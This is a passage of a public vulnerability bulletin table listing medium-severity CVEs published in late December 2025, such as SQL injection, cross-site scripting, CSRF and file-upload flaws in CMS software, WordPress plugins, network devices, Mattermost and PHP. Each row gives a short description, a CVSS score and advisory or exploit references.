| liweiyi--ChestnutCMS | A flaw has been found in liweiyi ChestnutCMS up to 1.5.8. This vulnerability affects the function FilenameUtils.getExtension of the file /dev-api/common/upload of the component Filename Handler. Executing manipulation of the argument File can lead to unrestricted upload. The attack may be launched remotely. The exploit has been published and may be used. | 2025-12-22 | 6.3 | CVE-2025-15009 | VDB-337715 | liweiyi ChestnutCMS Filename upload FilenameUtils.getExtension unrestricted upload VDB-337715 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #719590 | liweiyi ChestnutCMS <=1.5.8 Unrestricted Upload https://github.com/yuccun/CVE/blob/main/ChestnutCMS-Arbitrary_File_Upload.md https://github.com/yuccun/CVE/blob/main/ChestnutCMS-Arbitrary_File_Upload.md#vulnerability-proof |
| loganhong--php loganSite | A security flaw has been discovered in loganhong php loganSite up to c035fb5c3edd0b2a5e32fd4051cbbc9e61a31426. This affects an unknown function of the file /includes/article_detail.php of the component Article Handler. Performing manipulation of the argument ID results in sql injection. It is possible to initiate the attack remotely. This product is using a rolling release to provide continious delivery. Therefore, no version details for affected nor updated releases are available. | 2025-12-22 | 6.3 | CVE-2025-15014 | VDB-337720 | loganhong php loganSite Article article_detail.php sql injection VDB-337720 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #720037 | loganhong php 1 SQL Injection https://github.com/ssiled/cve/issues/1 |
| LogicalDOC Srl--LogicalDOC Enterprise | LogicalDOC Enterprise 7.7.4 contains multiple authenticated OS command execution vulnerabilities that allow attackers to manipulate binary paths when changing system settings. Attackers can exploit these vulnerabilities by modifying configuration parameters like antivirus.command, ocr.Tesseract.path, and other system paths to execute arbitrary system commands with elevated privileges. | 2025-12-24 | 6.5 | CVE-2019-25257 | ExploitDB-44021 Official Product Homepage Zero Science Lab Disclosure (ZSL-2018-5452) |
| macrozheng--mall | A security vulnerability has been detected in macrozheng mall up to 1.0.3. This vulnerability affects unknown code of the file /member/address/update/ of the component Member Endpoint. The manipulation leads to improper authorization. Remote exploitation of the attack is possible. The exploit has been disclosed publicly and may be used. | 2025-12-28 | 4.3 | CVE-2025-15118 | VDB-338496 | macrozheng mall Member Endpoint update improper authorization VDB-338496 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #711758 | mall latest Improper Control of Resource Identifiers https://github.com/Hwwg/cve/issues/31 |
| marshmallow-code--marshmallow | Marshmallow is a lightweight library for converting complex objects to and from simple Python datatypes. In versions from 3.0.0rc1 to before 3.26.2 and from 4.0.0 to before 4.1.2, Schema.load(data, many=True) is vulnerable to denial of service attacks. A moderately sized request can consume a disproportionate amount of CPU time. This issue has been patched in version 3.26.2 and 4.1.2. | 2025-12-22 | 5.3 | CVE-2025-68480 | https://github.com/marshmallow-code/marshmallow/security/advisories/GHSA-428g-f7cq-pgp5 https://github.com/marshmallow-code/marshmallow/commit/d24a0c9df061c4daa92f71cf85aca25b83eee508 |
| Mattermost--Mattermost | Mattermost versions 11.1.x <= 11.1.0, 11.0.x <= 11.0.5, 10.12.x <= 10.12.3, 10.11.x <= 10.11.7 fails to validate user channel membership when attaching Mattermost posts as comments to Jira issues, which allows an authenticated attacker with access to the Jira plugin to read post content and attachments from channels they do not have access to. | 2025-12-24 | 4.3 | CVE-2025-13767 | https://mattermost.com/security-updates |
| Mattermost--Mattermost | Mattermost versions 11.1.x <= 11.1.0, 11.0.x <= 11.0.5, 10.12.x <= 10.12.3, 10.11.x <= 10.11.7 fail to verify that post actions invoking /share-issue-publicly were created by the Jira plugin which allowed a malicious Mattermost user to exfiltrate Jira tickets when victim users interacted with affected posts | 2025-12-24 | 4.1 | CVE-2025-64641 | MMSA-2025-00551 |
| Microhard Systems--Microhard Systems 3G/4G Cellular Ethernet and Serial Gateway Arbitrary File Attacks | Microhard Systems IPn4G 1.1.0 contains an authentication bypass vulnerability in the hidden system-editor.sh script that allows authenticated attackers to read, modify, or delete arbitrary files. Attackers can exploit unsanitized 'path', 'savefile', 'edit', and 'delfile' parameters to perform unauthorized file system modifications through GET and POST requests. | 2025-12-24 | 5.5 | CVE-2018-25144 | ExploitDB-45037 Microhard Systems Product Homepage Zero Science Lab Disclosure (ZSL-2018-5485) |
| Microhard Systems--Microhard Systems 3G/4G Cellular Ethernet and Serial Gateway Configuration Download | Microhard Systems IPn4G 1.1.0 contains a configuration file disclosure vulnerability that allows authenticated attackers to download sensitive system configuration files. Attackers can retrieve configuration files from multiple directories including '/www', '/etc/m_cli/', and '/tmp' to access system passwords and network settings. | 2025-12-24 | 6.5 | CVE-2018-25145 | ExploitDB-45036 Microhard Systems Product Web Page Zero Science Lab Disclosure (ZSL-2018-5484) |
| Microhard Systems--Microhard Systems 3G/4G Cellular Ethernet and Serial Gateway CSRF Vulnerabilities | Microhard Systems IPn4G 1.1.0 contains a cross-site request forgery vulnerability that allows attackers to perform administrative actions without user consent. Attackers can craft malicious web pages to change admin passwords, add new users, and modify system settings by tricking authenticated users into loading a specially crafted page. | 2025-12-24 | 4.3 | CVE-2018-25149 | ExploitDB-45034 Microhard Systems Product Web Page Zero Science Lab Disclosure (ZSL-2018-5478) |
| Microhard Systems--Microhard Systems 3G/4G Cellular Ethernet and Serial Gateway Service Control DoS | Microhard Systems IPn4G 1.1.0 contains an undocumented vulnerability that allows authenticated attackers to list and manipulate running system processes. Attackers can send arbitrary signals to kill background processes and system services through a hidden feature, potentially causing service disruption and requiring device restart. | 2025-12-24 | 6.5 | CVE-2018-25146 | ExploitDB-45035 Microhard Systems Product Web Page Zero Science Lab Disclosure (ZSL-2018-5481) |
| Mybb--myBB forums | myBB Forums 1.8.26 contains a stored cross-site scripting vulnerability in the template management system that allows authenticated administrators to inject malicious scripts when creating new templates. Attackers can exploit this vulnerability by inserting script payloads in the template title field when adding new templates through the 'Templates and Style' > 'Templates' > 'Manage Templates' > 'Global Templates' interface, causing arbitrary JavaScript to execute when the template is viewed. | 2025-12-22 | 5.4 | CVE-2023-53976 | ExploitDB-51136 Official myBB Software Version Page VulnCheck Advisory: myBB Forums 1.8.26 Stored Cross-Site Scripting via Template Management |
| Mybb--myBB forums | myBB Forums 1.8.26 contains a stored cross-site scripting vulnerability in the forum management system that allows authenticated administrators to inject malicious scripts when creating new forums. Attackers can exploit this vulnerability by inserting script payloads in the forum title field when adding new forums through the 'Forums and Posts' > 'Forum Management' interface, causing arbitrary JavaScript to execute when the forum listing is viewed. | 2025-12-22 | 5.4 | CVE-2023-53977 | ExploitDB-51136 Official myBB Software Version Page VulnCheck Advisory: myBB Forums 1.8.26 Stored Cross-Site Scripting via Forum Management |
| Mybb--myBB forums | myBB Forums 1.8.26 contains a stored cross-site scripting vulnerability in the forum announcement system that allows authenticated administrators to inject malicious scripts when creating announcements. Attackers can exploit this vulnerability by inserting script payloads in the announcement title field when adding announcements through the 'Forums and Posts' > 'Forum Announcements' interface, causing arbitrary JavaScript to execute when the announcement is displayed on the forum. | 2025-12-22 | 5.4 | CVE-2023-53978 | ExploitDB-51136 Official myBB Software Version Page VulnCheck Advisory: myBB Forums 1.8.26 Stored Cross-Site Scripting via Forum Announcements |
| CmsEasy--CmsEasy | A flaw has been found in CmsEasy up to 7.7.7. Affected is the function savetemp_action in the library /lib/admin/template_admin.php of the component Backend Template Management Page. Executing manipulation of the argument content/tempdata can lead to code injection. The attack may be launched remotely. The exploit has been published and may be used. The vendor was contacted early about this disclosure but did not respond in any way. | 2025-12-28 | 4.7 | CVE-2025-15148 | VDB-338525 | CmsEasy Backend Template Management template_admin.php savetemp_action code injection VDB-338525 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #716303 | cmseasy 7.7.7 Command Injection https://note-hxlab.wetolink.com/share/msJH69Y06ZlS |
| DedeCMS--DedeCMS | A vulnerability was identified in DedeCMS up to 5.7.118. This impacts an unknown function of the file /freelist_main.php. The manipulation of the argument orderby leads to sql injection. It is possible to initiate the attack remotely. The exploit is publicly available and might be used. | 2025-12-22 | 6.3 | CVE-2025-15004 | VDB-337710 | DedeCMS freelist_main.php sql injection VDB-337710 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #717316 | dedecms V5.7.118 SQL Injection https://note-hxlab.wetolink.com/share/JPq560c6F6tu |
| EyouCMS--EyouCMS | A security flaw has been discovered in EyouCMS up to 1.7.6. The affected element is an unknown function of the file /application/admin/logic/FilemanagerLogic.php of the component Backend Template Management. The manipulation of the argument content results in sql injection. It is possible to launch the attack remotely. The exploit has been released to the public and may be exploited. The vendor was contacted early about this disclosure but did not respond in any way. | 2025-12-28 | 4.7 | CVE-2025-15143 | VDB-338521 | EyouCMS Backend Template Management FilemanagerLogic.php sql injection VDB-338521 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #716078 | EyouCMS 1.7.6 Command Injection https://note-hxlab.wetolink.com/share/XfINjg5i25Ud |
| PbootCMS--PbootCMS | A security vulnerability has been detected in PbootCMS up to 3.2.12. The affected element is the function get_user_ip of the file core/function/handle.php of the component Header Handler. The manipulation of the argument X-Forwarded-For leads to use of less trusted source. The attack can be initiated remotely. The exploit has been disclosed publicly and may be used. | 2025-12-28 | 5.3 | CVE-2025-15154 | VDB-338532 | PbootCMS Header handle.php get_user_ip less trusted source VDB-338532 | CTI Indicators (IOB, IOC, IOA) Submit #719818 | PbootCMS 3.2.12 get_user_ip IP Address Spoofing https://note-hxlab.wetolink.com/share/JyBNgF8JagWQ |
| omec-project--UPF | A flaw has been found in omec-project UPF up to 2.1.3-dev. This affects the function handleSessionEstablishmentRequest of the file /pfcpiface/pfcpiface/messages_session.go of the component PFCP Session Establishment Request Handler. This manipulation causes null pointer dereference. The attack may be initiated remotely. The exploit has been published and may be used. The project was informed of the problem early through an issue report but has not responded yet. | 2025-12-28 | 4.3 | CVE-2025-15156 | VDB-338534 | omec-project UPF PFCP Session Establishment Request messages_session.go handleSessionEstablishmentRequest null pointer dereference VDB-338534 | CTI Indicators (IOB, IOC, IOA) Submit #719824 | Aether SD-Core UPF v2.1.3-dev NULL Pointer Dereference https://github.com/omec-project/upf/issues/979 |
| ONLYOFFICE--Document Server | ONLYOFFICE Docs before 9.2.1 allows XSS in the textarea of the comment editing form. This is related to DocumentServer. | 2025-12-24 | 6.4 | CVE-2025-68917 | https://github.com/ONLYOFFICE/DocumentServer/blob/master/CHANGELOG.md#921 |
| ONLYOFFICE--Document Server | ONLYOFFICE Docs before 9.2.1 allows XSS via the Font field for the Multilevel list settings window. This is related to DocumentServer. | 2025-12-25 | 6.4 | CVE-2025-68935 | https://github.com/ONLYOFFICE/DocumentServer/blob/master/CHANGELOG.md#921 |
| ONLYOFFICE--Document Server | ONLYOFFICE Docs before 9.2.1 allows XSS via the Color theme name. This is related to DocumentServer. | 2025-12-25 | 6.4 | CVE-2025-68936 | https://github.com/ONLYOFFICE/DocumentServer/blob/master/CHANGELOG.md#921 |
| Orangescrum--orangescrum | Orangescrum 1.8.0 contains multiple cross-site scripting vulnerabilities that allow authenticated attackers to inject malicious scripts through various input parameters. Attackers can exploit parameters like 'projid', 'CS_message', and 'name' to execute arbitrary JavaScript code in victim's browsers by submitting crafted payloads through application endpoints. | 2025-12-23 | 5.4 | CVE-2021-47716 | ExploitDB-50554 Official Orangescrum Product Homepage VulnCheck Advisory: Orangescrum 1.8.0 Cross-Site Scripting via Authenticated Endpoints |
| Pexip--Infinity | Pexip Infinity 32.0 through 37.1 before 37.2, in certain configurations of OTJ (One Touch Join) for Teams SIP Guest Join, has Improper Input Validation in the OTJ service, allowing a remote attacker to trigger a software abort via a crafted calendar invite, leading to a denial of service. | 2025-12-25 | 5.9 | CVE-2025-49088 | https://docs.pexip.com/admin/security_bulletins.htm |
| Pexip--Infinity | Pexip Infinity 38.0 and 38.1 before 39.0 has insufficient access control in the RTMP implementation, allowing an attacker to disconnect RTMP streams traversing a Proxy Node. | 2025-12-25 | 5.9 | CVE-2025-66378 | https://docs.pexip.com/admin/security_bulletins.htm |
| PHP Group--PHP | In PHP versions:8.1.* before 8.1.34, 8.2.* before 8.2.30, 8.3.* before 8.3.29, 8.4.* before 8.4.16, 8.5.* before 8.5.1, a heap buffer overflow occurs in array_merge() when the total element count of packed arrays exceeds 32-bit limits or HT_MAX_SIZE, due to an integer overflow in the precomputation of element counts using zend_hash_num_elements(). This may lead to memory corruption or crashes and affect the integrity and availability of the target server. | 2025-12-27 | 6.5 | CVE-2025-14178 | https://github.com/php/php-src/security/advisories/GHSA-h96m-rvf9-jgm2 |
| PluginOps--Feather Login Page | Cross-Site Request Forgery (CSRF) vulnerability in PluginOps Feather Login Page allows Cross Site Request Forgery. This issue affects Feather Login Page: from n/a through 1.1.7. | 2025-12-22 | 4.3 | CVE-2025-62107 | https://vdp.patchstack.com/database/wordpress/plugin/feather-login-page/vulnerability/wordpress-feather-login-page-plugin-1-1-7-cross-site-request-forgery-csrf-vulnerability?_s_id=cve |
| prasathmani--TinyFileManager | A flaw has been found in prasathmani TinyFileManager up to 2.6. Affected by this issue is some unknown functionality of the file tinyfilemanager.php. This manipulation of the argument fullpath causes path traversal. Remote exploitation of the attack is possible. The exploit has been published and may be used. The vendor was contacted early about this disclosure but did not respond in any way. | 2025-12-28 | 4.7 | CVE-2025-15138 | VDB-338516 | prasathmani TinyFileManager tinyfilemanager.php path traversal VDB-338516 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #714177 | tinyfilemanager 2.6 File Upload(RCE) https://mesquite-dream-86b.notion.site/tinyfilemanager-File-Upload-RCE-Report-2c7512562197800d86b3e68534a56a91 |
| PX4--PX4-Autopilot | A vulnerability was found in PX4 PX4-Autopilot up to 1.16.0. Affected by this issue is the function MavlinkLogHandler::state_listing/MavlinkLogHandler::log_entry_from_id of the file src/modules/mavlink/mavlink_log_handler.cpp. The manipulation results in stack-based buffer overflow. The attack is only possible with local access. The patch is identified as 338595edd1d235efd885fd5e9f45e7f9dcf4013d. It is best practice to apply a patch to resolve this issue. | 2025-12-28 | 5.3 | CVE-2025-15150 | VDB-338527 | PX4 PX4-Autopilot mavlink_log_handler.cpp log_entry_from_id stack-based overflow VDB-338527 | CTI Indicators (IOB, IOC, IOA) Submit #717323 | PX4 Autopilot main branch Stack-based Buffer Overflow https://github.com/PX4/PX4-Autopilot/issues/26118 https://github.com/PX4/PX4-Autopilot/pull/26124 https://github.com/PX4/PX4-Autopilot/pull/26124/commits/338595edd1d235efd885fd5e9f45e7f9dcf4013d |
| Riello--NetMan | Riello UPS NetMan 208 Application before 1.12 allows cgi-bin/login.cgi username SQL Injection. For example, an attacker can delete the LOGINFAILEDTABLE table. | 2025-12-24 | 6.5 | CVE-2025-68914 | https://github.com/gerico-lab/riello-multiple-vulnerabilities-2025 |
| Riello--NetMan | Riello UPS NetMan 208 Application before 1.12 allows cgi-bin/loginbanner_w.cgi XSS via a crafted banner. | 2025-12-24 | 5.5 | CVE-2025-68915 | https://github.com/gerico-lab/riello-multiple-vulnerabilities-2025 |
| shanyu--SyCms | A vulnerability has been found in shanyu SyCms up to a242ef2d194e8bb249dc175e7c49f2c1673ec921. This issue affects the function addPost of the file Application/Admin/Controller/FileManageController.class.php of the component Administrative Panel. The manipulation leads to code injection. The attack is possible to be carried out remotely. The exploit has been disclosed to the public and may be used. This product adopts a rolling release strategy to maintain continuous delivery The project was informed of the problem early through an issue report but has not responded yet. This vulnerability only affects products that are no longer supported by the maintainer. | 2025-12-28 | 4.7 | CVE-2025-15130 | VDB-338508 | shanyu SyCms Administrative Panel FileManageController.class.php addPost code injection VDB-338508 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #712813 | SyCms 1.0 Unrestricted Upload https://gitee.com/shanyu/SyCms/issues/IDCEWG |
| SOCA Technology Co., Ltd--SOCA Access Control System | SOCA Access Control System 180612 contains a cross-site request forgery vulnerability that allows attackers to perform administrative actions without proper request validation. Attackers can craft malicious web pages that submit forged requests to create admin accounts by tricking logged-in users into visiting a malicious site. | 2025-12-24 | 5.3 | CVE-2018-25127 | ExploitDB-46834 SOCA Technology Product Homepage Zero Science Lab Disclosure (ZSL-2019-5520) |
| SOUND4 Ltd.--Impact/Pulse/First | SOUND4 IMPACT/FIRST/PULSE/Eco v2.x contains a cross-site request forgery vulnerability that allows attackers to perform administrative actions without user consent. Attackers can craft malicious web pages that submit HTTP requests to the radio processing interface, triggering unintended administrative operations when a logged-in user visits the page. | 2025-12-22 | 5.3 | CVE-2023-53961 | ExploitDB-51168 SOUND4 Official Product Homepage Zero Science Lab Disclosure (ZSL-2022-5722) VulnCheck Advisory: SOUND4 IMPACT/FIRST/PULSE/Eco v2.x Cross-Site Request Forgery |
| stellarwp--Membership Plugin Restrict Content | The Membership Plugin - Restrict Content plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'register_form' and 'restrict' shortcodes in all versions up to, and including, 3.2.15 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. | 2025-12-23 | 6.4 | CVE-2025-14000 | https://www.wordfence.com/threat-intel/vulnerabilities/id/0b6a84d7-9e77-4a2f-b065-872e8650e75e?source=cve https://plugins.trac.wordpress.org/browser/restrict-content/tags/3.2.15/core/includes/shortcodes.php#L26 https://plugins.trac.wordpress.org/browser/restrict-content/tags/3.2.15/core/includes/shortcodes.php#L135 https://plugins.trac.wordpress.org/browser/restrict-content/tags/3.2.15/core/includes/member-forms.php#L126 https://plugins.trac.wordpress.org/changeset/3420370/restrict-content/trunk/core/includes/member-forms.php?old=2642097&old_path=restrict-content%2Ftrunk%2Fcore%2Fincludes%2Fmember-forms.php https://plugins.trac.wordpress.org/changeset/3420370/restrict-content/trunk/core/includes/shortcodes.php?old=2850120&old_path=restrict-content%2Ftrunk%2Fcore%2Fincludes%2Fshortcodes.php |
| sunkaifei--FlyCMS | A security flaw has been discovered in sunkaifei FlyCMS up to abbaa5a8daefb146ad4d61027035026b052cb414. The affected element is an unknown function of the file src/main/java/com/flycms/web/system/IndexAdminController.java of the component Admin Login. Performing manipulation of the argument redirectUrl results in cross site scripting. The attack can be initiated remotely. The exploit has been released to the public and may be exploited. Continious delivery with rolling releases is used by this product. Therefore, no version details of affected nor updated releases are available. The vendor was contacted early about this disclosure but did not respond in any way. | 2025-12-26 | 4.3 | CVE-2025-15093 | VDB-338422 | sunkaifei FlyCMS Admin Login IndexAdminController.java cross site scripting VDB-338422 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #708996 | sunkaifei FlyCms <=1.0.0 XSS https://github.com/sunkaifei/FlyCms/issues/15 |
| sunkaifei--FlyCMS | A weakness has been identified in sunkaifei FlyCMS up to abbaa5a8daefb146ad4d61027035026b052cb414. The impacted element is the function userLogin of the file src/main/java/com/flycms/web/front/UserController.java of the component User Login. Executing manipulation of the argument redirectUrl can lead to cross site scripting. The attack can be launched remotely. The exploit has been made available to the public and could be exploited. This product does not use versioning. This is why information about affected and unaffected releases are unavailable. The project was informed of the problem early through an issue report but has not responded yet. | 2025-12-26 | 4.3 | CVE-2025-15094 | VDB-338423 | sunkaifei FlyCMS User Login UserController.java userLogin cross site scripting VDB-338423 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #708997 | sunkaifei FlyCms <=1.0.0 XSS https://github.com/sunkaifei/FlyCms/issues/16 |
| Synaccess Networks Inc.--netBooter NP-0801DU | Synaccess netBooter NP-0801DU 7.4 contains a cross-site request forgery vulnerability that allows attackers to perform administrative actions without proper request validation. Attackers can craft malicious web pages with hidden form submissions to add admin users by tricking authenticated administrators into loading a malicious page. | 2025-12-24 | 4.3 | CVE-2018-25133 | ExploitDB-45894 Synaccess Networks Official Product Homepage Zero Science Lab Disclosure (ZSL-2018-5501) |
| Teradek, LLC--Cube | Teradek Cube 7.3.6 contains a cross-site request forgery vulnerability that allows attackers to change administrative passwords without proper request validation. Attackers can craft a malicious web page with a hidden form to submit password change requests to the device's system configuration interface. | 2025-12-24 | 5.3 | CVE-2018-25156 | ExploitDB-44675 Teradek Official Product Homepage Zero Science Lab Disclosure (ZSL-2018-5464) |
| Teradek, LLC--Slice | Teradek Slice 7.3.15 contains a cross-site request forgery vulnerability that allows attackers to change administrative passwords without proper request validation. Attackers can craft a malicious web page that automatically submits password change requests to the device when a logged-in user visits the page. | 2025-12-24 | 5.3 | CVE-2018-25155 | ExploitDB-44676 Teradek Official Product Homepage Zero Science Lab Disclosure (ZSL-2018-5467) |
| Teradek, LLC--VidiU Pro | Teradek VidiU Pro 3.0.3 contains a server-side request forgery vulnerability in the management interface that allows attackers to manipulate GET parameters 'url' and 'xml_url'. Attackers can exploit this flaw to bypass firewalls, initiate network enumeration, and potentially trigger external HTTP requests to arbitrary destinations. | 2025-12-24 | 5.3 | CVE-2019-25251 | ExploitDB-44672 Teradek Product Homepage Zero Science Lab Disclosure (ZSL-2018-5461) |
| Teradek--VidiU Pro | Teradek VidiU Pro 3.0.3 contains a cross-site request forgery vulnerability that allows attackers to change administrative passwords without proper request validation. Attackers can craft malicious web pages that automatically submit password change requests to the device when a logged-in administrator visits the page. | 2025-12-24 | 5.3 | CVE-2019-25252 | ExploitDB-44671 Teradek Official Product Homepage Zero Science Lab Disclosure (ZSL-2018-5460) |
| thehappymonster--Happy Addons for Elementor | The Happy Addons for Elementor plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'ha_page_custom_js' parameter in all versions up to, and including, 3.20.3 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page, despite the intended role restriction of Custom JS to Administrators. | 2025-12-23 | 6.4 | CVE-2025-14635 | https://www.wordfence.com/threat-intel/vulnerabilities/id/16e7adef-68ab-4dd6-bd80-252622cfe705?source=cve https://plugins.trac.wordpress.org/browser/happy-elementor-addons/tags/3.20.2/extensions/custom-js.php#L76 https://plugins.trac.wordpress.org/browser/happy-elementor-addons/tags/3.20.2/extensions/custom-js.php#L60 https://plugins.trac.wordpress.org/changeset/3421733/ |
| TOZED--ZLT M30s | A vulnerability was found in TOZED ZLT M30s up to 1.47. Impacted is an unknown function of the file /reqproc/proc_post of the component Web Management Interface. Performing manipulation of the argument goformId results in information disclosure. It is possible to initiate the attack remotely. The exploit has been made public and could be used. The vendor was contacted early about this disclosure but did not respond in any way. | 2025-12-25 | 5.3 | CVE-2025-15082 | VDB-338410 | TOZED ZLT M30s Web Management proc_post information disclosure VDB-338410 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #707306 | ZLT M30s MTNNGRM30S_1.47, M30S_1.47 (other versions might be vulnerable) Improper Access Control - Critical Information Disclosure https://www.hacklab.eu.org/blogs/zlt_m30s_information_disclosure https://youtu.be/u_H29UdiPOc |
| TRENDnet--TEW-822DRE | A vulnerability has been found in TRENDnet TEW-822DRE 1.00B21/1.01B06. This affects the function sub_43ACF4 of the file /boafrm/formWsc. Such manipulation of the argument peerPin leads to command injection. The attack can be executed remotely. The exploit has been disclosed to the public and may be used. The vendor was contacted early about this disclosure but did not respond in any way. | 2025-12-28 | 6.3 | CVE-2025-15139 | VDB-338517 | TRENDnet TEW-822DRE formWsc sub_43ACF4 command injection VDB-338517 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #715131 | TRENDnet TEW-822DRE v1.01B06 / 1.00B21 Command Injection https://pentagonal-time-3a7.notion.site/TRENDnet-TEW-822DRE-Command-Injection-2c9e5dd4c5a580f190e9c411ad627e9a#2c9e5dd4c5a5801dae7ad20828639d4b |
| Tyche softwares--Product Delivery Date for WooCommerce Lite | Vulnerability in Tyche softwares Product Delivery Date for WooCommerce - Lite. This issue affects Product Delivery Date for WooCommerce - Lite: from n/a through 2.7.0. | 2025-12-23 | 5.3 | CVE-2023-52210 | https://vdp.patchstack.com/database/wordpress/plugin/product-delivery-date-for-woocommerce-lite/vulnerability/wordpress-product-delivery-date-for-woocommerce-lite-plugin-2-7-0-broken-access-control-vulnerability?_s_id=cve |
| VideoFlow Ltd.--Digital Video Protection DVP | VideoFlow Digital Video Protection DVP 2.10 contains an authenticated directory traversal vulnerability that allows attackers to access arbitrary system files through unvalidated 'ID' parameters. Attackers can exploit multiple Perl scripts like downloadsys.pl to read sensitive files by manipulating directory path traversal in download requests. | 2025-12-24 | 6.5 | CVE-2019-25256 | ExploitDB-44386 VideoFlow Product Web Page Zero Science Lab Disclosure (ZSL-2018-5454) |
| VideoFlow Ltd.--VideoFlow Digital Video Protection DVP | VideoFlow Digital Video Protection DVP 2.10 contains an authenticated remote code execution vulnerability that allows attackers to execute system commands with root privileges. Attackers can exploit the vulnerability through a cross-site request forgery (CSRF) mechanism to gain unauthorized system access. | 2025-12-24 | 4.3 | CVE-2019-25255 | ExploitDB-44387 VideoFlow Official Product Homepage Zero Science Lab Disclosure (ZSL-2018-5455) |
| Vikas Ratudi--Chakra test | Missing Authorization vulnerability in Vikas Ratudi Chakra test allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects Chakra test: from n/a through 1.0.1. | 2025-12-23 | 4.3 | CVE-2025-68557 | https://vdp.patchstack.com/database/wordpress/plugin/chakra-test/vulnerability/wordpress-chakra-test-plugin-1-0-1-broken-access-control-vulnerability?_s_id=cve |
| Vikas Ratudi--VPSUForm | Exposure of Sensitive System Information to an Unauthorized Control Sphere vulnerability in Vikas Ratudi VPSUForm allows Retrieve Embedded Sensitive Data. This issue affects VPSUForm: from n/a through 3.2.24. | 2025-12-23 | 6.5 | CVE-2025-68551 | https://vdp.patchstack.com/database/wordpress/plugin/v-form/vulnerability/wordpress-vpsuform-plugin-3-2-24-sensitive-data-exposure-vulnerability?_s_id=cve |
| VillaTheme--HAPPY | Missing Authorization vulnerability in VillaTheme HAPPY allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects HAPPY: from n/a through 1.0.9. | 2025-12-23 | 5.3 | CVE-2025-68556 | https://vdp.patchstack.com/database/wordpress/plugin/happy-helpdesk-support-ticket-system/vulnerability/wordpress-happy-plugin-1-0-9-broken-access-control-vulnerability?_s_id=cve |
| Voidthemes--Void Elementor WHMCS Elements For Elementor Page Builder | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Voidthemes Void Elementor WHMCS Elements For Elementor Page Builder. This issue affects Void Elementor WHMCS Elements For Elementor Page Builder: from n/a through 2.0.1.2. | 2025-12-22 | 6.5 | CVE-2025-62094 | https://vdp.patchstack.com/database/wordpress/plugin/void-elementor-whmcs-elements/vulnerability/wordpress-void-elementor-whmcs-elements-for-elementor-page-builder-plugin-2-0-1-2-cross-site-scripting-xss-vulnerability?_s_id=cve |
| WebCodingPlace--Responsive Posts Carousel Pro | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in WebCodingPlace Responsive Posts Carousel Pro allows Stored XSS. This issue affects Responsive Posts Carousel Pro: from n/a through 15.2. | 2025-12-23 | 6.5 | CVE-2025-68548 | https://vdp.patchstack.com/database/wordpress/plugin/responsive-posts-carousel-pro/vulnerability/wordpress-responsive-posts-carousel-pro-plugin-15-2-cross-site-scripting-xss-vulnerability?_s_id=cve |
| wpshuffle--Frontend Post Submission Manager Lite Frontend Posting WordPress Plugin | The Frontend Post Submission Manager Lite - Frontend Posting WordPress Plugin plugin for WordPress is vulnerable to unauthorized loss of data due to an incorrect authorization check on the 'media_delete_action' function in all versions up to, and including, 1.2.6. This makes it possible for unauthenticated attackers to delete arbitrary attachments. | 2025-12-25 | 5.3 | CVE-2025-14913 | https://www.wordfence.com/threat-intel/vulnerabilities/id/19a6b19c-244d-4b30-8db2-b4d06a5f5509?source=cve https://plugins.trac.wordpress.org/browser/frontend-post-submission-manager-lite/tags/1.2.6/includes/classes/class-fpsml-ajax.php#L91 https://plugins.trac.wordpress.org/changeset/3427082/frontend-post-submission-manager-lite |
| youlaitech--youlai-mall | A security flaw has been discovered in youlaitech youlai-mall 1.0.0/2.0.0. This affects the function deductBalance of the file mall-ums/ums-boot/src/main/java/com/youlai/mall/ums/controller/app/MemberController.java of the component Balance Handler. The manipulation results in improper authorization. The attack can be launched remotely. The exploit has been released to the public and may be exploited. The vendor was contacted early about this disclosure but did not respond in any way. | 2025-12-25 | 4.3 | CVE-2025-15085 | VDB-338413 | youlaitech youlai-mall Balance MemberController.java deductBalance improper authorization VDB-338413 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #708175 | youlai-mall latest Improper Control of Resource Identifiers https://github.com/Hwwg/cve/issues/26 |
| youlaitech--youlai-mall | A weakness has been identified in youlaitech youlai-mall 1.0.0/2.0.0. This impacts the function getMemberByMobile of the file mall-ums/ums-boot/src/main/java/com/youlai/mall/ums/controller/app/MemberController.java. This manipulation causes improper access controls. The attack may be initiated remotely. The exploit has been made available to the public and could be exploited. The vendor was contacted early about this disclosure but did not respond in any way. | 2025-12-25 | 4.3 | CVE-2025-15086 | VDB-338414 | youlaitech youlai-mall MemberController.java getMemberByMobile access control VDB-338414 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #708176 | youlai-mall latest Improper Control of Resource Identifiers https://github.com/Hwwg/cve/issues/27 |
| youlaitech--youlai-mall | A security vulnerability has been detected in youlaitech youlai-mall 1.0.0/2.0.0. Affected is the function submitOrderPayment of the file mall-oms/oms-boot/src/main/java/com/youlai/mall/oms/controller/app/OrderController.java. Such manipulation of the argument orderSn leads to improper authorization. The attack may be launched remotely. The exploit has been disclosed publicly and may be used. The real existence of this vulnerability is still doubted at the moment. The vendor was contacted early about this disclosure but did not respond in any way. | 2025-12-25 | 4.3 | CVE-2025-15087 | VDB-338415 | youlaitech youlai-mall OrderController.java submitOrderPayment improper authorization VDB-338415 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #708180 | youlai-mall latest Improper Control of Resource Identifiers https://github.com/Hwwg/cve/issues/30 |
